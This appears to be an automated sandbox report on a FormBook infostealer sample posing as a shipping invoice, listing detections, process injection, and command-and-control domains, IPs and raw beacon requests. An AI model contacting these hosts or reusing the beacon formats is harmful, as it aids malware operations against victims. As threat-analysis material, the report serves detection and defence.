Source: Yara match	File source: 00000000.00000002.348709027.00000000001C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.868540226.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.356953040.0000000000480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012C1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	0_2_012C1204
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012C1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	0_2_012C1806
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0036041E CreateBindCtx,SysAllocStringByteLen,SysFreeString,	4_2_0036041E
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_00361AA2 CreateBindCtx,MkParseDisplayName,	4_2_00361AA2
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_003566C1 CoCreateInstance,CoCreateInstance,CoCreateInstance,GetUserDefaultLCID,CoGetClassObject,CreateBindCtx,	4_2_003566C1

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
192.185.209.182	alivioquantico.com	United States	46606	UNIFIEDLAYER-AS-1US	true
65.21.196.90	00050591.xyz	United States	199592	CP-ASDE	true
185.107.56.60	www.thepowerofzeus.com	Netherlands	43350	NFORCENL	true
162.241.203.16	ilovetvs.com	United States	26337	OIS1US	true
84.32.84.32	arthemis-168bet.site	Lithuania	33922	NTT-LT-ASLT	true

Contacted Domains

Name	IP	Active
alivioquantico.com	192.185.209.182	true
www.batremake.com	213.186.33.5	true
ilovetvs.com	162.241.203.16	true
www.mantapnagita777.com	104.21.91.94	true
parkingpage.namecheap.com	91.195.240.19	true
www.thepowerofzeus.com	185.107.56.60	true
arthemis-168bet.site	84.32.84.32	true
00050591.xyz	65.21.196.90	true
www.freyja.info	76.223.54.146	true
www.00050591.xyz	unknown	unknown
www.uhug.xyz	unknown	unknown
www.gbqspj.club	unknown	unknown
www.arthemis-168bet.site	unknown	unknown
www.bougeefilth.com	unknown	unknown
www.kjsdhklssk73.xyz	unknown	unknown
www.alivioquantico.com	unknown	unknown
www.crucka.xyz	unknown	unknown
www.ilovetvs.com	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
www.crucka.xyz/jd21/	true	Avira URL Cloud: safe	unknown
http://www.thepowerofzeus.com/jd21/?tBZLfTtx=28cPGcaENb280W65HmbHU6pQLIPuemsbyE+toeghGUICUOM9gHK+zZW7s47qkPel79A7Dw==&oHEpRr=M2JpdRJ	true	Avira URL Cloud: safe	unknown
http://www.00050591.xyz/jd21/?tBZLfTtx=+5nsDbzeImt5UbX4GDv04YNxDKhKydlr4q6vzHl7qi3uGOgXSU0vDET8vanb4niZtoheVA==&oHEpRr=M2JpdRJ	true	Avira URL Cloud: safe	unknown
http://www.arthemis-168bet.site/jd21/?tBZLfTtx=4y1ij/qZRR1bNd/L/F5yLi+I0SkPKWffZZi+nDy9y9Wv5I2iqoZUG1btNWEB8myok8jbUg==&oHEpRr=M2JpdRJ	true	Avira URL Cloud: safe	unknown
http://www.ilovetvs.com/jd21/?tBZLfTtx=Bo1mqRoziIz4wcXV2Hze6fEKc1jUulyNDnBrZ1tCE4J7kcYVEj/nayXnveqqwa6JZwq74w==&oHEpRr=M2JpdRJ	true	Avira URL Cloud: safe	unknown

AV Detection

Found malware configuration

Source: 00000002.00000002.356899843.0000000000110000.00000040.10000000.00040000.00000000.sdmp

Yara detected FormBook

Source: Yara match	File source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.356899843.0000000000110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.356943162.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.868511294.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.868524955.00000000001A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.348709027.00000000001C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.868540226.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.356953040.0000000000480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Joe Sandbox ML: detected

Uses 32bit PE files

Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: C:\Windows\explorer.exe

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: wntdll.pdb source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe, 00000000.00000003.348238153.0000000002C20000.00000004.00001000.00020000.00000000.sdmp, COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe, 00000000.00000003.347630446.0000000002A30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.356992362.0000000000720000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.348109061.0000000000430000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.348482025.0000000000590000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.356992362.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, cscript.exe, 00000004.00000002.868679723.0000000002080000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, 00000004.00000003.357247442.0000000001EF0000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000003.356948769.0000000000560000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000002.868679723.0000000002200000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: cscript.pdbN source: svchost.exe, 00000002.00000002.356958657.00000000004B0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.356910306.0000000000214000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000002.868555182.0000000000350000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdb source: explorer.exe, 00000003.00000002.869745021.000000000880F000.00000004.80000000.00040000.00000000.sdmp, cscript.exe, 00000004.00000002.868627962.00000000006F2000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000002.868865940.00000000028AF000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: cscript.pdb source: svchost.exe, 00000002.00000002.356958657.00000000004B0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.356910306.0000000000214000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, cscript.exe, 00000004.00000002.868555182.0000000000350000.00000040.80000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012ADBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_012ADBBE
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0127C2A2 FindFirstFileExW,	0_2_0127C2A2
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012B698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_012B698F
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012B68EE FindFirstFileW,FindClose,	0_2_012B68EE
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012AD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_012AD076
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012AD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_012AD3A9
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012B979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_012B979D
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012B9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_012B9642
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012B9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_012B9B2B
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012B5C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_012B5C97
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0035F0D3 GetFileAttributesW,GetLastError,FindFirstFileW,WideCharToMultiByte,WideCharToMultiByte,GetLastError,WideCharToMultiByte,GetFileAttributesA,GetLastError,FindFirstFileA,FindClose,	4_2_0035F0D3

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Windows\SysWOW64\cscript.exe

Code function: 4x nop then sub dword ptr [esp+04h], 0Ch

4_2_00355AD1

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 192.185.209.182 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 65.21.196.90 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.00050591.xyz
Source: C:\Windows\explorer.exe	Network Connect: 84.32.84.32 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.thepowerofzeus.com
Source: C:\Windows\explorer.exe	Domain query: www.arthemis-168bet.site
Source: C:\Windows\explorer.exe	Domain query: www.kjsdhklssk73.xyz
Source: C:\Windows\explorer.exe	Domain query: www.alivioquantico.com
Source: C:\Windows\explorer.exe	Network Connect: 185.107.56.60 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 162.241.203.16 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.ilovetvs.com

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.crucka.xyz/jd21/

Performs DNS queries to domains with low reputation

Source: C:\Windows\explorer.exe	DNS query: www.00050591.xyz
Source: C:\Windows\explorer.exe	DNS query: www.kjsdhklssk73.xyz
Source:	DNS query: www.uhug.xyz
Source:	DNS query: www.crucka.xyz

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /jd21/?tBZLfTtx=28cPGcaENb280W65HmbHU6pQLIPuemsbyE+toeghGUICUOM9gHK+zZW7s47qkPel79A7Dw==&oHEpRr=M2JpdRJ HTTP/1.1Host: www.thepowerofzeus.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /jd21/?tBZLfTtx=LcHXUWoW2sdPa4UFpuGqq/go6wrzpC/UeDgbPZxccUPKb44TjfXPeWdmbH3xVj13RIFx0w==&oHEpRr=M2JpdRJ HTTP/1.1Host: www.alivioquantico.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /jd21/?tBZLfTtx=+5nsDbzeImt5UbX4GDv04YNxDKhKydlr4q6vzHl7qi3uGOgXSU0vDET8vanb4niZtoheVA==&oHEpRr=M2JpdRJ HTTP/1.1Host: www.00050591.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /jd21/?tBZLfTtx=4y1ij/qZRR1bNd/L/F5yLi+I0SkPKWffZZi+nDy9y9Wv5I2iqoZUG1btNWEB8myok8jbUg==&oHEpRr=M2JpdRJ HTTP/1.1Host: www.arthemis-168bet.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /jd21/?tBZLfTtx=Bo1mqRoziIz4wcXV2Hze6fEKc1jUulyNDnBrZ1tCE4J7kcYVEj/nayXnveqqwa6JZwq74w==&oHEpRr=M2JpdRJ HTTP/1.1Host: www.ilovetvs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 185.107.56.60 185.107.56.60
Source: Joe Sandbox View	IP Address: 84.32.84.32 84.32.84.32

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View	ASN Name: CP-ASDE CP-ASDE
Source: Joe Sandbox View	ASN Name: NFORCENL NFORCENL
Source: Joe Sandbox View	ASN Name: OIS1US OIS1US
Source: Joe Sandbox View	ASN Name: NTT-LT-ASLT NTT-LT-ASLT

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012BCF1A InternetQueryDataAvailable,InternetReadFile,GetLastError,SetEvent,SetEvent,

0_2_012BCF1A

Source: global traffic	HTTP traffic detected: GET /jd21/?tBZLfTtx=28cPGcaENb280W65HmbHU6pQLIPuemsbyE+toeghGUICUOM9gHK+zZW7s47qkPel79A7Dw==&oHEpRr=M2JpdRJ HTTP/1.1Host: www.thepowerofzeus.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /jd21/?tBZLfTtx=LcHXUWoW2sdPa4UFpuGqq/go6wrzpC/UeDgbPZxccUPKb44TjfXPeWdmbH3xVj13RIFx0w==&oHEpRr=M2JpdRJ HTTP/1.1Host: www.alivioquantico.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /jd21/?tBZLfTtx=+5nsDbzeImt5UbX4GDv04YNxDKhKydlr4q6vzHl7qi3uGOgXSU0vDET8vanb4niZtoheVA==&oHEpRr=M2JpdRJ HTTP/1.1Host: www.00050591.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /jd21/?tBZLfTtx=4y1ij/qZRR1bNd/L/F5yLi+I0SkPKWffZZi+nDy9y9Wv5I2iqoZUG1btNWEB8myok8jbUg==&oHEpRr=M2JpdRJ HTTP/1.1Host: www.arthemis-168bet.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /jd21/?tBZLfTtx=Bo1mqRoziIz4wcXV2Hze6fEKc1jUulyNDnBrZ1tCE4J7kcYVEj/nayXnveqqwa6JZwq74w==&oHEpRr=M2JpdRJ HTTP/1.1Host: www.ilovetvs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: global traffic	DNS traffic detected: DNS query: www.thepowerofzeus.com
Source: global traffic	DNS traffic detected: DNS query: www.alivioquantico.com
Source: global traffic	DNS traffic detected: DNS query: www.00050591.xyz
Source: global traffic	DNS traffic detected: DNS query: www.kjsdhklssk73.xyz
Source: global traffic	DNS traffic detected: DNS query: www.arthemis-168bet.site
Source: global traffic	DNS traffic detected: DNS query: www.ilovetvs.com
Source: global traffic	DNS traffic detected: DNS query: www.bougeefilth.com
Source: global traffic	DNS traffic detected: DNS query: www.uhug.xyz
Source: global traffic	DNS traffic detected: DNS query: www.crucka.xyz
Source: global traffic	DNS traffic detected: DNS query: www.freyja.info
Source: global traffic	DNS traffic detected: DNS query: www.batremake.com
Source: global traffic	DNS traffic detected: DNS query: www.gbqspj.club
Source: global traffic	DNS traffic detected: DNS query: www.mantapnagita777.com

Source: global traffic

Source: explorer.exe, 00000003.00000000.348892322.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.868529966.00000000001D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000003.00000002.869745021.0000000008CFF000.00000004.80000000.00040000.00000000.sdmp, cscript.exe, 00000004.00000002.868865940.0000000002D9F000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://thebatcompany.fr/jd21?tBZLfTtx=GfbF6txqq2gI5hQXVs74X
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.00050591.xyz
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.00050591.xyz/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.00050591.xyz/jd21/www.kjsdhklssk73.xyz
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.00050591.xyzReferer:
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.alivioquantico.com
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.alivioquantico.com/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.alivioquantico.com/jd21/www.00050591.xyz
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.alivioquantico.comReferer:
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.amsya.com
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.amsya.com/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.amsya.comReferer:
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.arthemis-168bet.site
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.arthemis-168bet.site/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.arthemis-168bet.site/jd21/www.ilovetvs.com
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.arthemis-168bet.siteReferer:
Source: explorer.exe, 00000003.00000000.348892322.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.868529966.00000000001D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.batremake.com
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.batremake.com/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.batremake.com/jd21/www.gbqspj.club
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.batremake.comReferer:
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bougeefilth.com
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bougeefilth.com/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bougeefilth.com/jd21/www.uhug.xyz
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bougeefilth.comReferer:
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.crucka.xyz
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.crucka.xyz/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.crucka.xyz/jd21/www.freyja.info
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.crucka.xyzReferer:
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.freyja.info
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.freyja.info/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.freyja.info/jd21/www.batremake.com
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.freyja.infoReferer:
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gbqspj.club
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gbqspj.club/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gbqspj.club/jd21/www.mantapnagita777.com
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gbqspj.clubReferer:
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ilovetvs.com
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ilovetvs.com/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ilovetvs.com/jd21/www.bougeefilth.com
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ilovetvs.comReferer:
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kapten69pola.xyz
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kapten69pola.xyz/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kapten69pola.xyz/jd21/www.tyumk.xyz
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kapten69pola.xyzReferer:
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kjsdhklssk73.xyz
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kjsdhklssk73.xyz/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kjsdhklssk73.xyz/jd21/www.arthemis-168bet.site
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kjsdhklssk73.xyzReferer:
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mantapnagita777.com
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mantapnagita777.com/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mantapnagita777.com/jd21/www.kapten69pola.xyz
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mantapnagita777.comReferer:
Source: explorer.exe, 00000003.00000002.869588514.00000000078E6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.350006795.00000000078F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.869194618.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.350006795.0000000007972000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.868840236.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.349305261.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.349644935.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000003.00000002.869588514.00000000078E6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.350006795.00000000078F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.869194618.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.350006795.0000000007972000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.868840236.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.349305261.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.349644935.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000003.00000002.868840236.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.349305261.000000000260E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerxe
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.thepowerofzeus.com
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.thepowerofzeus.com/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.thepowerofzeus.com/jd21/www.alivioquantico.com
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.thepowerofzeus.comReferer:
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tyumk.xyz
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tyumk.xyz/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tyumk.xyz/jd21/www.amsya.com
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tyumk.xyzReferer:
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.uhug.xyz
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.uhug.xyz/jd21/
